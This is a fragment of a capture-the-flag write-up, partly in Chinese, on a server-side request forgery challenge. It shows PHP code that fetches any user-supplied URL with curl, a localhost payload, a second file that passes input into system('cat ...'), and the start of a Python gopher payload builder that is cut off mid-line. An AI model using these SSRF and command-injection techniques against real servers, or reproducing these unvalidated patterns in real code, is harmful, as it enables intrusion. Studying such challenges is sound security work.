ssrf_get
<?php
//flag in flag.php
error_reporting(0);
highlight_file(__FILE__);
$url=$_GET['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
?url=127.0.0.1/flag.php
看到
<?php
highlight_file(__FILE__);
error_reporting(0);
include('f.php');
echo $_SERVER['REMOTE_ADDR'].'<br/>';
$a = $_GET['a'];
if($_SERVER['REMOTE_ADDR']=='127.0.0.1'){
system('cat '.$a);
}else{
die('非本地用户,禁止访问');
}
?>
这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值
burp拦截 取前两句
GET /flag.php?a=f.php HTTP/1.1
Host: 110.42.137.79:8115
import urllib.parse
payload = """
GET /flag.php?a=f.php H